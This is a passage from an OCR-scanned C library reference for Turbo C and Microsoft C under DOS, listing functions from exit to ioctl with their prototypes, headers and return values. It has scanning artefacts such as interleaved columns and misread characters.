ENOENT (path or file not found) 
ENOEXEC (exec format error) 
ENOMEM (not enough memory). 


if successful, there is no return to the caller; the 
caller is killed off 


Avoid exit( int completioncode ) 


:_ exit 


prototype in process.h and stdlib.h 


terminates program, closes all files, buffered output is written, 
and any registered exit functions (via -atexit-()) are called 


Avoid _exit( int completioncode ) 


‘exp 
NAdouble 


prototype in process.h 
terminates program, BUT doesn't close files or write the buffered 
output and NO registered exit functions (via -atexit-()) are called 


exp( double x ) 


prototype in math.h 


returns y = e**x or HUGE_VAL on error 


:_expand:_based:_fexpand:_nexpand 


:fabs 
NAdouble 


MSC: void *_expand( void *block, size_t size ) 
MSC: void far *_fexpand( void far *block, size_t size ) 
MSC: void near *_nexpand( void near *block, size_t size ) 


MSC: void _based(void) *_bexpand( _segment seg, 
void _based(void) *block, size_t size ) 


prototype in malloc.h 


block = pointer to previously allocated memory block 

size = new size in bytes 

seg = based segment value 

returns pointer to reallocated memory block on success or NULL 
if not; (_bexpand returns -1 on failure) 


fabs( double x ) 
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- prototype in math.h 
- returns absolute value of x 
:farcalloc 
ATC: void far *farcalloc( unsigned long nunits, unsigned long units ) 
- prototype in alloc.h 
- allocates memory from the far heap for an array of nunits 
elements, each units bytes long 
- returns pointer to allocated block or NULL if not enough memory 
- can allocate all of memory & chunks bigger than 64K 
- must use far pointers 
:farcoreleft 
ATC: unsigned long farcoreleft( void ) 
- prototype in alloc.h 
- returns unused memory in bytes beyond highest allocated block 
:farfree 
ATC: void farfree( void far *block ) 


- prototype in alloc.h 


- frees block of previously allocated far memory (block must be 
allocated by -farcalloc-()) 


:farrealloc 
ATC: void far *farrealloc( void far *block, unsigned long newsize ) 
- prototype in alloc.h (malloc.h for MS C) 
- adjusts size of allocated block to newsize, copying contents 
to a new location if necessary 
- returns pointer to reallocated block or NULL on error 
:fevt 
Achar *fcvt( double value, int ndigit, int *decpt, int *sign ) 
- prototype in stdlib.h 
- converts a floating pt number to a string of ndigit digits, 
returning pointer to that string 
- correct digit is rounded for Fortran-F format output of the 
number of digits equal to ndigit 
- decpt is position of decimal point (negative value means to left 
of returned digits) and sign is 0 if positive, else negative 
:fclose 
Aint fclose( FILE *fp ) 
- prototype in stdio.h 


- closes a file stream (see -fdopen-() to convert handle to stream) 
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- generally flushes buffers, too 

- return code should be checked. Attempts to delete an open file 
will damage the file system. 

- returns 0 on success or EOF on error 


:fcloseall 
Aint fcloseall( void ) 


- prototype in stdio.h 


- closes all file streams except stdin & stdout 
- returns © on success or EOF on error 


:fdopen 
AFILE *fdopen( int handle, char *type ) 


- prototype in dos.h 


- associates a file STREAM with a file HANDLE 
- handle is returned by -creat-(), -dup-(), -dup2-() or -open-() 
- type must match mode of the handle 
- returns file stream or NULL on error 
- see -fopen-() 
:feof 
Aint feof( FILE *stream ) 


- prototype in stdio.h 


- detects end of file on a file stream 
- returns zero if NOT eof, else nonzero 


:ferror 
Aint ferror( FILE *stream ) 


- prototype in stdio.h 


- tests stream for read/write error, return nonzero if error 

- error remains set until -clearerr-() or -rewind-() is called 
:fflush 
Nint fflush( FILE *fp ) 


- prototype in stdio.h 


- writes contents of output buffers associated with fp to stream 
and clears input buffer contents; fp is NOT closed 
- returns 0 on success or EOF on error 
:fgetc 
NAint fgetc( FILE *fp ) 


- prototype in stdio.h 


- function (not a macro) which gets character from stream 
- returns char (converted to an int) or EOF 
- see -getc-() 

:fgetchar 

Nint fgetchar( void ) 
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- prototype in stdio.h 


- gets character from stream 
- same as -fgetc-(stdin) 
- returns char (converted to an int) or EOF 
- see -getc-() 
:fgets 
Achar *fgets( char *s, int size, FILE *fp ) 


- prototype in stdio.h 
- gets a string from a stream, reading until size - 1 characters 
have been read or a newline is detected 
- newline character is retained 
- returns s argument if 0K, else NULL on eof or error 
:filelength 
Along filelength( int handle ) 
- prototype in io.h 
- gets file size in bytes for file associated with handle 
- value returned includes AZ in ASCII files; value is the same as 
displayed in the DOS DIR command 
- returns -1L on error 
:fileno 
Aint fileno( FILE *stream ) 


- prototype in stdio.h 


- gets file handle for the given stream 
- error return undefined 


:findfirst:_dos_ findfirst 


% TC: int findfirst( const char *path, struct ffblk *ffblk, int attr) 
% MSC unsigned _dos_findfirst( char *path, unsigned attr, 
% struct find_t *fileinfo ) 


- prototype in dir.h, also include dos.h (MS C: dos.h only) 
- gets disk directory via DOS 0x4E, where attr is: 
% Turbo C Microsoft C 
FA_RDONLY  _A_RDONLY 


FA_HIDDEN —_A_HIDDEN 
FA_SYSTEM _A SYSTEM 


FA_LABEL _A_VOLID 

FA_DIREC _A_SUBDIR 

FA_ARCH _A_ARCH 

% struct ffblk (Turbo C) struct find_t (MSC) 

char ff_reserved[21]; char reserved[21]; 
char ff_attrib; char attrib; 
unsigned ff_ftime; unsigned wr_time; 
unsigned ff_fdate; unsigned wr_date; 
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long ff_fsize; long size; 
char ff_name[13]; char name[13]; 
}; }; 


- attributes can be logically OR'ed 

- struct ffblk is defined in Turbo C's dir.h 

- struct find_t is defined in MS C's dos.h 

- updates -DTA-, provisions for saving/setting DTA should be made 

- normal files are always included along with files that match 
the requested attributes except when the LABEL attribute is 
requested. It's up to the programmer to determine which 
actually match the requested attributes. 

- returns 0 if OK, -1 if no matching files found or on error 


- see -FILE ATTRIBUTES-, -FINDNEXT-, -GETDTA- and -SETDTA- 
:findnext:_dos_findnext 
% TC: int findnext( struct ffblk *ffblk ) 
% MSC: unsigned _dos_findnext( struct find_t *fileinfo ) 


- prototype in dir.h, also include (MSC: dos.h only) 


- findnext updates -DTA- 

- returns 0 if OK, -1 if no matching files found or on error 

- gets next disk directory via DOS 0x4F, after calling -findfirst-() 
- struct ffblk is defined in dir.h for Turbo C and dos.h for MSC 


% struct ffblk (Turbo C) struct find_t (MSC) 
char ff_reserved[21]; char reserved[21]; 
char ff_attrib; char attrib; 
unsigned ff_ftime; unsigned wr_time; 
unsigned ff_fdate; unsigned wr_date; 
long ff_fsize; long size; 
char ff_name[13]; char name[13]; 

}; }; 


- normal files are always included along with files that match 
the requested attributes except when the LABEL attribute is 
requested. It's up to the programmer to determine which 
actually match the requested attributes. 
- see -FILE ATTRIBUTES-, -findfirst-(), -getdta-(), -setdta-() 
: floodfill: floodfill_w 
% MSC: short far _floodfill w( double wx, double wy, short bcolor ) 
% MSC: short far _floodfill( short x, short y, short bcolor ) 


- prototype in graph.h 
- X, y = coordinates 
- bcolor = fill boundary color 
- if (x,y) falls inside a figure, the figure is filled with the 
with the current fill color; if it falls outside the figure the 
background is filled 
- returns nonzero value on success or © on failure 
:floor 
Adouble floor( double x ) 
- prototype in math.h 


- returns largest integer <= x 
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:flushall 
Aint flushall( void ) 


: fmod 
Adouble 


: fnmerge 


% 
% 


prototype in stdio.h 
same as -fflush-() except ALL open file streams are done 
returns integer indicating number of open file streams 


fmod( double x, double y ) 


prototype in math.h 
calculates x modulo y, the remainder of x/y, 


returning the remainder 


TC: void fnmerge( char *path, const char *drive, 
const char *dir, const char *name, const char *ext) 


prototype in dir.h 
makes a file name (path) from drive, dir, name, and ext 


dir can include subdirectories 
maximum sizes for these strings are: 


MAXPATH 80 path 

MAXDRIVE 3 drive - includes colon (:) 

MAXDIR 66 dir - includes leading/trailing backslashes 
MAXFILE 9 name 

MAXEXT 5 ext, including leading dot (.) 


invertible with -fnsplit-() 


:fnsplit 


% 
% 


:fopen 


TC: void fnsplit( const char *path, char *drive, char *dir, 
char *name, char *ext) 


prototype in dir.h 
splits a file name from path into drive, dir, name, and ext 


dir can include subdirectories 
maximum sizes for these strings are: 


MAXPATH 80 path 

MAXDRIVE 3 drive - includes colon (:) 

MAXDIR 66 dir - includes leading/traing backslashes 
MAXFILE 9 name 

MAXEXT 5 ext, including leading dot (.) 


invertible with -fnmerge-() 


AFILE *fopen( const char *filename, const char *type ) 


prototype in stdio.h 


type is a combination of the following: 
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% Mode 


Description 


dI Ra read text/binary 

"wy" write text/binary 

"a" append text/binary 

ph pi allow update access 

LA E text file 

"b" binary file 

% Read Write Append 

" (ui "wt n" UA (text) 

"rb" "wb" "ab" (binary) 

Ur+" Uw+" "a+" (update) 

"r+t" "w+t" "a+t" (update text) 

"r+b" "w+b" "a+b" (update binary) 
read - read only (unless "r+") 
write - create 


append - seek to end of file or create file 


- text mode input, will have CRs discarded 

- using any of the stdio functions results in a default allocation 
of 512 bytes for the 1/0 buffer and the inclusion of the standard 
memory allocation functions 

- returns stream or NULL on error 


:fp_off 


Aunsigned FP_OFF( void far *fptr ) 


- prototype in dos.h 


- gets offset of far pointer fptr 
- returns unsigned integer value 
- not available in earlier versions of MS C; use the following: 


#define FP_OFF(fptr) ((unsigned)(fptr)) 


- see -FP_SEG-() 


:fp_seg 


Aunsigned FP_SEG( void far *fptr ) 


- prototype in dos.h 


- gets segment of far pointer fptr 
- returns unsigned integer value 
- not available in some versions of MS C; use the following: 


#define FP_SEG(fptr) ((unsigned)((unsigned long)(fptr) >> 16)) 


- see -FP_OFF-() 


:_fpreset 


Avoid _fpreset( void ) 


- prototype in float.h 


- resets floating point math package, usually used with -signal-(), 
-system-(), -exec...-(), -Spawn...-() 
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- should be called before using 8087/80287 after using one of the 
above functions 
- define identically for Turbo C and MS C 


:fprintf 
Aint fprintf( FILE *fp, const char *format [, argi, arg2, ...] ) 


- prototype in stdio.h 


- returns number of bytes it attempted to write regardless of 
success. To check for a successful fprintf call on a buffered 
stream, use fflush which returns accurate error information. 

- using printf or any of the stdio functions results in a default 
allocation of 512 bytes for the 1/0 buffer and the inclusion of 
the standard memory allocation functions 

- see -printf-() and -PRINTF SPEC- 

:fputc 
Aint fputc( int c, FILE *fp ) 


- prototype in stdio.h 


- puts char c to stream fp 

- using fputc or any of the stdio functions results in a default 
allocation of 512 bytes for the 1/0 buffer and the inclusion of 
the standard memory allocation functions 

- returns c or EOF 


:fputs 
Aint fputs( const char *s, FILE *fp ) 


- prototype in stdio.h 


- using fputs or any of the stdio functions results in a default 
allocation of 512 bytes for the 1/0 buffer and the inclusion of 
the standard memory allocation functions 

- see -puts-() 

:fread 
Asize_t fread( void *buf, size_t size, size_t count, FILE *fp ) 


- prototype in stdio.h 


- reads (count * size) bytes from file stream "fp" 

- returns the number of blocks actually read 

- to get better feedback from this function, the parameters "size" 
and "count" may be swapped. If count is 1, this method allows 
fread() to return the actual number of bytes read 

- using fread or any of the stdio functions results in a default 
allocation of 512 bytes for the 1/0 buffer and the inclusion of 
the standard memory allocation functions 

- returns © (or short count) on eof or error 


- see -fopen-() -fread-() -setvbuf-() 
:free 
Avoid free( void *pseg ) 


- prototype in stdlib.h, alloc.h (malloc.h for MS C) 


Pagina 542 di 991 


- frees allocated block located at pseg 
- MS C ignores a NULL parameter (see — ffree-()) 


:_freect 
AMSC: unsigned _freect( size _t size ) 


- prototype in malloc.h 


- size = size of allocation in bytes 

- returns the count of calls to an allocation function a program 
can make before failing 

- test is made in default data segment only 


:freemem 
ATC: int freemem( unsigned seg ) 


- prototype in dos.h 


- frees previously allocated DOS block defined by seg 
- returns 0 on success, -1 on error errno=ENONMEM 
- MS C uses — dos_freemem-() 
- see -INT 21,49- 
:freopen 
AFILE *freopen( const char *fname, const char *type, FILE *fp ) 


- prototype in stdio.h 
- substitutes named file in place of open fp and closes original fp 
- useful for changing file attached to stdin, stdout, or stderr 
- returns fp on success or NULL on error 
- see -fopen-() 
:frexp 
Adouble frexp( double value, int eptr ) 


- prototype in math.h 


- calculates mantissa x (a double < 1) and n ( integer) such 
that value = x * 2**n, storing n in word that eptr points 


:fscanf 
Aint fscanf( FILE *fp, const char *format, argi1, arg2, ... ) 
- prototype in stdio.h 
- gets formatted input from a stream fp 
- see -scanf-() and -SCANF SPECS- 
:fseek 
NAint fseek( FILE *fp, long offset, int mode ) 
- prototype in stdio.h 


- sets file pointer associated with fp to position which is offset 
bytes beyond file location given by mode 


- mode is 0 (beginning of file or SEEK_SET) 


Pagina 543 di 991 


1 (current position or SEEK_CUR) 
2 (end of file or SEEK_END 


- discards any character pushed back by ungetc() 

- fseek() clears eof indicator but not file error indicator 

- returns 0 if pointer moved OK, nonzero if file not opened or 
invalid seek for device. DOS does not report an error if an 
attempt to seek past EOF is made 

- see -ftell-() 


:fstat 
NAint fstat( int handle, struct stat *buff ) 


- prototype in stat.h 
- see -stat-() 

:ftell 

Along ftell( FILE *fp ) 
- prototype in stdio.h 


- returns current file position in bytes from beginning of file 
or -1L on error 


- see -fseek-() 


Asize_t fwrite(const void *buf, size_t size, size_t count, FILE *fp) 


- prototype in stdio.h 
- writes (count * size) bytes to file stream "fp" 
- Swapping parameters "size" and "count" can often provide more 
exact feedback (exactly how many bytes were written) 
- returns number of data blocks actually written or a short count 
on error 
- see -fopen-() -fread-() -setvbuf-() 
:gevt 
Achar *gcvt( double value, int ndigit, char *buf ) 
- prototype in stdlib.h 
- converts a floating point number to a string of ndigit digits, 
storing string into buf and returning pointer to that string 
- outputs in Fortran-F format if possible, else in Fortran-E format 
:geninterrupt 
ATC: void geninterrupt( int interrupt_num ) 


- prototype in dos.h 


- generates actual interrupt for "interrupt_num" in code 
- not a true function, but inline code generation 


:igetc 
Aint getc( FILE *fp ) 
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- prototype in stdio.h 


- macro which returns next character in file stream "fp" or EOF 
on end of file or error 


:getcbrk 
ATC: int getcbrk( void ) 
- prototype in dos.h 
- gets control-break setting 


- return 0 Ctrl-C is off 
1 Ctrl-C is on 


:getch 
Aint getch( void ) 
- prototype in conio.h 
- returns next character from console without echoing 
:getchar 
Aint getchar( void ) 
- prototype in stdio.h 
- returns next character in file stream stdin or EOF on end of 
file or error 
- implemented as a macro 
:getche 
NAint getche( void ) 
- prototype in conio.h 


- function which returns next character from console WITH echoing 


:_getcolor 
AMSC: short far _getcolor( void ) 


- prototype in graph.h 
- returns the current color number 


- default color is the highest valid color in current palette 


:getcolor:putcolor 
% MSC: flagType GetColor( LINE line, la *colorlist, PFILE pFile ) 
% MSC: void PutColor( LINE line, la *colorlist, PFILE pFile ) 

- prototype in ext.h 


- GetColor returns nonzero if a color is attached to the line; 
zero otherwise 


:getcurdir 
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ATC: int getcurdir( int drive, char *direc ) 


- prototype in dir.h 


- get current directory for specified drive (0=default, 1=A, etc) 
- direc will contain directory name 


- returns 0 if OK 
-1 on error 


:_getcurrentposition 
% MSC: struct xycoord far _getcurrentposition( void ) 
% MSC: struct _wxycoord far _getcurrentposition_w( void ) 


- prototype in graph.h 
- returns current position coordinates in struct xycoord format 
:getcwd 
Achar *getcwd( char *buf, int n ) 
- prototype in dir.h 
- gets full path name of current working directory up to n bytes, 
placed into buf 


- returns buf pointer, else NULL 


:getdate 
ATC: void getdate( struct date *dateblk ) 


- prototype in dos.h 
- gets DOS date, filling it into the following structures: 


struct date 


int da_year; - Year including century 
char da_day; - Day of the month 

char da_mon; - Month (1 = Jan) 

}; 


- MS C uses — dos_getdate-() 
- see -INT 21,2A- 

:getdfree 

ATC: void getdfree( unsigned char drive, struct dfree *dfreep ) 
- prototype in dos.h 


- fills in structure with disk status information. 


struct dfree 


{ 

unsigned df_avail; - available clusters 
unsigned df_total; - total clusters 
unsigned df_bsec; - bytes per sector 
unsigned df_sclus; - sectors per cluster 
}; 


- drive is specified as A = 1, B = 2, C = 3, etc... 
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- in event of error, df_sclus is set to -1. 
- MS C uses — dos_getdiskfree-() 
- see -INT 21,36- 

:getdisk 

ATC: int getdisk( void ) 


- prototype in dir.h 


- returns integer drive number; 0 = A:, 1 = B:, 
- MS C uses — dos_getdrive-() 
- see -INT 21, 19- 
:getdta 
ATC: char far *getdta( void ) 


- prototype in dos.h 
- returns current setting of the -DTA- as a far pointer 
- see -INT 21, 2F- 

:getenv 

Achar *getenv( const char *envvar ) 


- prototype in stdlib.h 


- gets string from environment 


- MSDOS environment consists of strings of form envvar=varvalue,... 


- returns varvalue or 0 if envvar not found in environment 
:getfat 
ATC: void getfat( unsigned char drive, struct fatinfo *fatblkp ) 
- prototype in dos.h 
- returns information from the file allocation table for the 
specified drive (0=default,1=A, etc) into fatblk 


- structure fatinfo is defined as: 


struct fatinfo 


{ 

char fi sclus; - sectors per cluster 

char fi fatid; - media descriptor byte from FAT 
int fi_nclus; - cluster on disk 

int fi_bysec; - bytes per sector 

}; 


- closest MS C function is — dos_getdiskfree-() 
- see -INT 21, 1C- 
:getfatd 
ATC: void getfatd( struct fatinfo *fatblkp ) 
- prototype in dos.h 
- returns information from the file allocation table for the 
DEFAULT drive into fatblk 
- structure fatinfo is defined as: 
struct fatinfo 


char fi _ sclus; - sectors per cluster 
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char fi fatid; - media descriptor byte from FAT 


int fi_nclus; - cluster on disk 
int fi_bysec; - bytes per sector 
}; 
- closest MS C function is — dos_getdiskfree-() 
- see -INT 21, 1B- -getfat-() 
:_getfillmask 


AMSC: unsigned char far *_getfillmask( unsigned char far *mask ) 


prototype in graph.h 


- mask = receives current fill mask or NULL if mask not present 


:getftime 
ATC: int getftime( int handle, struct ftime *ftimep ) 


prototype in dos.h 


retrieves file time and date for the file associated with 
handle into ftimep 

structure ftime is defined in dos.h 

MS C uses — dos_getftime-() 

see -INT 21,57- 


:_getimage:_getimage_w:_getimage_wxy 
MSC: void far _getimage( short x1, short y1, short x2, short y2, 


% 
% 


% 
% 


% 
% 


char huge *image ) 


MSC: void far _getimage w( double wx1, double wy1, double wx2, 


double wy2, char huge *image ) 


MSC: void far _getimage wxy( struct _wxycoord far *pwxy1, 


struct _wxycoord far *pwxy2,char huge *image) 


prototype in graph.h 

(xX1, y1) upper left coordinates of rectangle 
(x2, y2) lower right coordinates of rectangle 
image = buffer to receive screen image 


Turbo C uses -getimage-() 


:getimage 


% 
% 


TC: void far getimage( int left, int top, int right, 
int bottom, void far *bitmap ) 


prototype in graphics.h 


copies video data from the screen rectange to buffer "bitmap" 
bitmap must be large enough to hold entire buffer plus 4 bytes 

(2 words) for height and width information. Function imagesize() 
should be used to determine the size of the buffer to avoid 
overwriting adjacent memory. 


MS C uses — getimage-() 
see -putimage-() -imagesize-() 


:_getlinestyle 
AMSC: unsigned short far _getlinestyle( void ) 
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- prototype in graph.h 
- returns current line style mask 


- each 1 bit represents a pixel (in current color) in the line 
mask; each 0 represent a pixel that is left alone 


- see — setlinestyle-() 
:_getlogcoord:_getviewcoord 
Astruct xycoord far _getlogcoord( short x, short y ) 
- prototype in graph.h 


- translates physical coordinates to logical coordinates returning 
the result in the format: 


struct xycoord 


short xcoord; 
short ycoord; 


}; 

- -_getviewcoord-() is obsolete; use - getlogcoord-() 

- see — getphyscoord-() 
:getpass 
ATC: char *getpass( const char *prompt ) 

- prototype in conio.h 

- reads a password from system console after typing prompt, 

without echoing 

- password cannot exceed 8 chars (not counting null terminator) 
:_getphyscoord 
AMSC: struct xycoord far _getphyscoord( short x, short y ) 

- prototype in graph.h 


- translates logical coordinates to physical coordinates returning 
the result in the format: 


struct xycoord 


short xcoord; 
short ycoord; 


}; 
- see —- getlogcoord-() 
:getpid 
AMSC: int getpid( void ) 
- prototype in process.h 
- returns process ID identifying the calling process (-PSP- segment) 


- Turbo C uses -getpsp-() 


:_getpixel:_getpixel_w 
% MSC: short far _getpixel( short x, short y ) 
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% MSC: short far _getpixel_w( double wx, double wy ) 


- prototype in graph.h 


- returns pixel value on success or -1 on failure 
- Turbo C uses -getpixel-() 


:getpsp 
ATC: unsigned getpsp( void ) 
- prototype in dos.h 


- returns segment address of the -PSP- using DOS -INT 21, 62- 
- valid only for DOS 3.x 

- use global variable _psp to get PSP instead for DOS 2.X 

- MS C uses -—getpid-() 


gets 
Achar *gets( char *s ) 
- prototype in stdio.h 
- reads string from stdin until newline character is read 
- newline character is replaced by \0 
- returns string or NULL on end-of-file or error 
:_gettextcolor 
AMSC: short far _gettextcolor( void ) 
- prototype in graph.h 
- returns current text color value 
:_gettextposition 
AMSC: struct rcecoord far _gettextposition( void ) 
- prototype in graph.h 
- returns current text position via rccoord structure: 
struct rccoord 


{ 


short row; 
short col; 


}; 
:gettime 
ATC: void gettime( struct time *timep ) 
- prototype in dos.h 
- gets MS-DOS time into the following data structure: 
struct time 


{ 


unsigned char ti min; 
unsigned char ti hour; 
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unsigned char ti hund; 
unsigned char ti sec; 


}; 
- MS C uses — dos_gettime-() 
:getvect 
ATC: void interrupt (*getvect( int intr_num ))() 
- prototype in dos.h 
- returns the value of the interrupt vector named by intr_num 
- returns 4-byte far pointer to current interrupt service routine 
stored in interrupt vector table 
- Example: 
void interrupt (*old_int_1c)(); 
old_int_1c = getvect( Ox1c ); 
- MS C uses — dos_getvect-() 
- see -INT 21,35- 
:getverify 
ATC: int getverify( void ) 
- prototype in dos.h 
- returns current state of verify flag (0==off, 1==on) 
- see -INT 21,54- 
:_getvideoconfig 
% MSC: struct videoconfig far *_getvideoconfig( 
% struct videoconfig far *config ) 
- prototype in graph.h 


- returns video configuration information via struct videoconfig: 


struct videoconfig 


short numxpixels; - pixels on X axis 

short numypixels; - pixels on Y axis 

short numtextcols; - text columns available 
short numtextrows; - text rows available 
short numcolors; - actual colors available 
short bitsperpixel; - bits per pixel 

short numvideopages; - available video page count 
short mode; - current video mode 
short adapter; - active display adapter 
short monitor; - active display monitor 
short memory; - adapter video memory in K 

}; 


:getw 

Aint getw( FILE *fp ) 
- prototype in stdio.h 
- gets integer from file stream fp 
- returns EOF (-1) on eof or error 


- use feof() or ferror() to verify -1 is an integer data word, and 
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:gmtime 
Astruct 


not an error return 


tm *gmtime( const time_t *clock ) 


prototype in time.h 


clock is a long integer (such as that returned by -time-()) 
returns GMT time in struct tm (see time.h) correcting for time 
zone and any daylight savings time 

global variable timezone is difference in seconds between GMT 
and local standard time 


:gsignal 
Aint gsignal( int sig ) 


:halloc 


prototype in signal.h 


ssignal() and gsignal() implement a software-signaling facility 
where software signals are integers 1-15 

gsignal() raises the signal given by sig and executes the action 
routine 

gsignal() returns value by action or SIG_IGN or SIG DFL 

UNIX based 

see -ssignal-() 


AMSC: void huge *halloc( long num, size_t size ) 


prototype in malloc.h 


num = count of elements to allocate 

size = size of each element; each element is set to zero; 
must be a power of 2 if size is over 128K 

alignment assures compatibility with all data types (para) 

returns pointer to allocated block on success or NULL on failure 

allocates memory directly from DOS 


see -hfree-() 


:_harderr:_hardresume:_hardretn 


% 
% 
% 


MSC: void _hardresume( int result ) 
MSC: void _hardretn( int error ) 
MSC: void _harderr( void (far *handler)() ) 


prototype in dos.h 


result = return value from handler 
error = number of error 


_harderr() registers a user critical error handler with it's 
own error handler which is to be called during a critical error 


handler = new -INT 24- handler with the format: 
handler(unsigned deverr,unsigned errcode, unsigned far *devhdr) 
where: deverr = device error code (AX value DOS passes to INT 24) 
errcode = error code (DI value DOS passes to -INT 21-) 
devhdr = pointer to device header on which error occurred 
handler must return via one of three methods: 
simple return returns to DOS error handler 
_hardresume() returns to DOS error handler 
_hardretn() returns to the application 
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:harderr 


hardresume() returns one of the following: 


_HARDERR_ABORT DOS should abort the process via -INT 23- 
_HARDERR_FAIL DOS should fail the call (DOS 3.x+) 
_HARDERR_IGNORE DOS should ignore the error 
_HARDERR_RETRY DOS should retry the operation 


due to the complexity of these functions consult the vendor 
documentation for more specific details 


Turbo C uses -hardretn-(), -harderr-() and -hardresume-() 
see -INT 24- 


ATC: void harderr( int (*fptr)()) 


prototype in dos.h 


harderr() establishes a hardware error handler for current 
program, invoked wherever interrupt 0x24 occurs 

function fptr is called when such an interrupt occurs 
handler function will be called with the following 
arguments= handler( int errval, int ax, int bp, int si) 
where errval is error code in DI register by MS-DOS, and 
ax, bp, si are values MS-DOS has in AX, BP, and SI regs 

ax indicates if disk or other device error occurs; if ax is 
not negative, then disk error, else device error. For disk 
error, ax ANDed with 0x00ff will give bad drive number 

bp and si together point to device driver header 
hardresume() may be called with rescode to return 

to MS-DOS, where rescode is 


2 - for abort 
1 - retry 
0 - ignore 


-hardrtn-() may be called to return directly to the application 
handler must return: 


O - ignore 
1 - retry 
2 - abort 


handler may issue DOS calls 1 through ©xC, but no others, and 
no C standard I/0 or UNIX I/0 calls may be used 
MS C uses _harderr() 


see -—hardresume-() -hardretn-() -INT 24- 


:hardresume 
ATC: void hardresume( int rescode ) 


prototype in dos.h 


hardresume() may be called with rescode to return to DOS, 
where rescode is: 


2 - abort 
1 - retry 
O - ignore 


MS C uses — hardresume-( ) 
see -harderr-() 


:hardretn 
ATC: void hardretn( int errcode ) 
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% 
% 
% 
% 


prototype in dos.h 


hardretn() may be called to return directly to the application 
MS C uses _hardretn 
see -harderr-() 


_heapchk:_bheapchk:_fheapchk:_nheapchk 


MSC: int _heapchk( void ) 
MSC: int _bheapchk( _segment seg ) 
MSC: int _fheapchk( void ) 
MSC: int _nheapchk( void ) 


prototype in malloc.h 


runs consistency check on different heaps 
heapchk maps to the other functions depending on memory model 


returns one of the following: 


_HEAPOK heap is ok 

_HEAPBADBEGIN initials allocation header couldn't be found 
_HEAPBADNODE heap/node has been damaged 

_HEAPEMPTY heap has not been initialized 


see -heapset-() -heapwalk-() 


_heapset:_bheapset:_fheapset:_nheapset 


% 
% 
% 
% 


% 
% 
% 
% 


MSC: int _heapset( unsigned fill ) 

MSC: int _bheapset( _segment seg, unsigned fill ) 
MSC: int _fheapset( unsigned fill ) 

MSC: int _nheapset( unsigned fill ) 


prototype in malloc.h 

heapset maps to the other functions depending on memory model 
first check heap consistency via -heapchk-() then fills memory 
with value specified in "fill" 

returns one of the following: 

_HEAPOK — heap is ok 

_HEAPBADBEGIN initials allocation header couldn't be found 
_HEAPBADNODE heap/node has been damaged 

_HEAPEMPTY heap has not been initialized 


see -heapchk-() -heapwalk-() 


RESPIRO _bheapwalk:_fheapwalk:_nheapwalk 
MSC: int _heapwalk( struct _heapinfo *entry ) 
MSC: int _bheapwalk( _segment seg, struct _heapinfo *entry ) 
MSC: int _fheapwalk( struct _heapinfo *entry ) 
MSC: int _nheapwalk( struct _heapinfo *entry ) 


prototype in malloc.h 


walks the heap for each entry specified and returns information 
about the entry via the other fields of the _heapinfo structure 
heapwalk maps to the other functions depending on memory model 
returns one of the following: 


_HEAPOK heap is ok 
_HEAPBADBEGIN initials allocation header couldn't be found 
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_HEAPBADNODE heap/node has been damaged 

_HEAPEMPTY heap has not been initialized 

_HEAPBADPTR parameter does not contain valid pointer to heap 
_HEAPEND end of help found w/o problem 


struct _heapinfo 


{ 

int _far *_pentry; - heap entry pointer 
size_t _size; - size of heap entry 

int _useflag; - entry in use return value 
}; 


- see -heapchk-() -heapset-() 
:hfree 
AMSC: void hfree( void huge *block ) 


- prototype in malloc.h 
- block = pointer to block of allocated memory 
- memory is returned to DOS 
- freeing an unallocated block will corrupt the DOS's -MCB- chain 
- see -halloc-() 
:hypot 
Adouble hypot( double x, double y ) 
- prototype in math.h 
- returns z where z**2 = x**2 + y**2, or HUGE VAL on error 
:imagesize 
Aunsigned far imagesize(int left, int top, int right, int bottom) 
- prototype in graphics.h 
- returns the size of the buffer required to hold the screen image 
represented by the coordinates 
- returns size or OxFFFF on error (image >= 64K-1) 
:inp:inpw 
% MSC: int inp( unsigned port ) 
% MSC: unsigned inpw( unsigned port ) 


- prototype in conio.h 


- port = hardware I/0 port 0-3FFh 
- returns byte or word data read from port 


:inport 
ATC: int inport( int port ) 


- prototype in dos.h 


- inport() reads word from input port port 
- MS C uses -inpw-() 
- see -inportb-() 

:inportb 

ATC: unsigned char inportb( int port ) 
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:int86 
NAint in 


:int86x 
% 
% 


:intdos 
Nint in 


:intdos 
% 
% 


:intr 
ATC: vo 
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prototype in dos.h 


inportb() is macro that reads a byte from hardware port 'port' 
MS C uses -inp-() 
see -inport-() 


t86( int intr_num, union REGS *inregs, union REGS *outregs ) 


prototype in dos.h 


executes 8086 software interrupt specified by intr_num 

copies register values from inregs into the registers 

if CF is set, an error has occurred 

preserves SP register so calls to -INT 25- and -INT 26- via this 
function don't require a stack adjustment 

unique to DOS 

see -int86x-() -intdos-() -intdosx-() -intr-() -REGS- 


int int86x( int intr_num, union REGS *inregs, 
union REGS *outregs, struct SREGS *segregs ) 


prototype in dos.h 


Executes 8086 software interrupt specified by intr_num 

Copies register values from inregs into the registers 

also copies segregs->x.ds and segregs->y.es into DS/ES 

if CF is set, an error has occurred 

preserves SP register so calls to -INT 25- and -INT 26- via this 
function don't require a stack adjustment 

unique to DOS 

see -int86-() -intdos-() -intdosx-() -intr-() -—REGS- 


tdos(union REGS *inregs, union REGS *outregs ) 


prototype in dos.h 


Executes 8086 software interrupt -INT 21- 
Copies register values from inregs into the registers 
if CF is set, an error has occurred 
unique to DOS 
see -intdosx-() -int86-() -int86x-() -intr-() —REGS- 
x 
int intdosx( union REGS *inregs, union REGS *outregs, 
struct SREGS *segregs ) 


prototype in dos.h 

executes 8086 software interrupt -INT 21- 

copies register values from inregs into the registers 
copies segregs->x.ds and segregs->y.es into DS/ES 

if CF is set, an error has occurred 

unique to DOS 

see -intdos-() -int86-() -int86x-() -intr-() -REGS- 


id intr( int intr_num, struct REGPACK *preg ) 


prototype in dos.h 
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:loctl 


same as -int86-() except that preg contains registers values 
both before & after executing interrupt 

preserves SP register so calls to -INT 25- and -INT 26- via this 
function don't require a stack adjustment 

see -—int86x-() -intdos-() -intdosx-() -REGS- 


ATC: int ioctl( int handle, int cmd [, void *argdx, int argcx] ) 


prototype in io.h 


direct interface to -INT 21,44- (IOCTL) 
cmd = 0 get device information 


1 set device information (in argdx) 
2 read argcx bytes into addr given by argdx 
3 write argcx bytes from addr given by argdx 
4 same as 2, but handle treated as drive (0=def.,1=A) 
5 same as 3, but handle treated as drive (0=def.,1=A) 
6 get input status 
7 get output status 
8 test removability (DOS 3.x) 
11 set sharing conflict retry count (DOS 3.x) 
- cmd = 0,1; returns device information (DX of IOCTL call) 
- cmd = 2-5; returns count of bytes transferred 
- cmd = 6,7; returns device status 


- returns -1 


